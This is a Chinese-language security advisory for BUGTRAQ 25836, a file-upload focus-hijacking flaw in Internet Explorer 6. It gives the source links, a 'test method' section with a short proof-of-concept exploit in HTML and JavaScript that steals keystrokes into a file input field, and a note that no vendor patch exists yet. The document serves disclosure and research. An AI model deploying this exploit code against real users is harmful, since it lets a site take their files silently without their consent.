发布日期：2007-09-27
更新日期：2007-09-28

受影响系统：

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0

描述：

---

BUGTRAQ  ID: 25836

Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer在处理文件上传时存在漏洞，恶意网站可能利用此漏洞窃取用户系统上的文件。

通常由于安全限制JavaScript是不允许设置焦点或在文件上传字段中设置值，以防从用户机器上传任意文件。浏览器厂商在表单的文件字段中实施这个限制，计算机用户只有选择了文件才能上传。但如果用户使用IE访问了恶意网页的话，就可能窃取用户的焦点，绕过浏览器安全限制，在用户不知情的情况下向远端服务器上传任意文件。

<*来源：Ronald van den Heetkamp （hackerwebzine@gmail.com）
  
  链接：http://www.0x000000.com/index.php?i=437
        http://secunia.com/advisories/27007/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# based upon Hong's exploit:
# http://sla.ckers.org/forum/read.php?3,13142

<script>

function Clear() {
     document.getElementById("label1").htmlFor="file1";
     document.getElementById("text1").focus();
}

function Down() {
     document.getElementById("file1").focus();
}

</script>

<input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
<label id="label1" name="label1"></label>
<br />
<textarea name="text1" id="text1" onkeydown="Down()">
</textarea>

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：2618
严重程度：0（网友投票）